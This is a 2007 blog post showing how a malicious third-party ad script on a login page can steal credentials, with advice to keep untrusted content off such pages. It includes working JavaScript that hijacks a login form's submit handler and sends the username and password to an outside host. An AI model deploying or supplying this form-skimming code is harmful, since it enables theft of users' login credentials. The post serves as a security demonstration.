Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine


Login page security issues

May 31st, 2007

I spent the last hour trying to prove this idea I’ve had for a while. Say you wanted to steal user’s login information for various social networking sites to steal their personal info and do who knows what with it. Well guess what… super easy to do if you can somehow get an ad (either third party or flash) on the login page of your victim site. This shouldn’t be too difficult since so many sites have login forms on practically every page.

Ok, how do you do it? Lets pretend you have a web page that has the following form on it:

<form method=\"post\" action=\"do_login.php\" id=\"passform\">
<b>User:</b><input type=\"text\" name=\"username\" /><br>
<b>Pass:</b><input type=\"password\" name=\"mypass\" /><br>
<input id=\"submitbutton\" type=\"submit\" value=\"Submit password\"/>
</form>

This is one of the most basic of HTML forms that simply takes a username and password and submits it to a login page. Normally when you fill out this form you click submit and end up being logged into the website. Now, lets imagine that we show an ad on this page. Our sketchy player above decides that he is going to steal your info using an advertisement, and guess what, it’s remarkably easy. Lets say we have the following ad-tag on the page:

<script type=\"text/javascript\" src=\"http://www.tenantnetwork.com/badad.js\"></script>

This is a very standard way of serving ads. You’ll see it pretty much through the web. Also, there are various ways through which you can execute javascript on the browser. You can either do this directly if you can serve a third party tag, or flash has various mechanisms where you can execute javascript as well. So, how do we steal your info? Super easy… here’s the javascript to do it :) 

 theForm = document.forms[\'passform\'];
 oldsubmit = theForm.onsubmit;
 theForm.onsubmit = function () {
    user = theForm.childNodes[2].value;
    pass = theForm.childNodes[6].value;
    window.open(\'http://www.tenantnetwork.com/steal_pass.php?pass=\' + pass + \'&user=\' + user,
                 \"mywindow\",\"menubar=0,resizable=0,width=350,height=150\");
    oldsubmit();
 } ;

 document.write(\'<img src=\"http://www.tenantnetwork.com/samplead.gif\"/>\');

So what does this code do? We store a copy of the original form submission JS into “oldsubmit”, then we simply replace the existing form submit and grab the username and password you’ve input and then send it to a third party website. I happened to choose my failed real estate site, was the only third party I could get access to =). Not bad right? Note that I transmitted the info using a popup window but I’m sure the smarter guys out there could think of a hundred different ways of doing this.

Own a website that people login to? I would highly recommend removing any and all untrusted third party content from pages that have sensitive information.

I’ve put together a very simple working example here. This page shows a login form with a third party ad. Try putting in a random username and pass, you should see a popup from the “third party” that served the ad with a nice little message =).

Posted by Mike Filed in online advertising, security 7 Comments »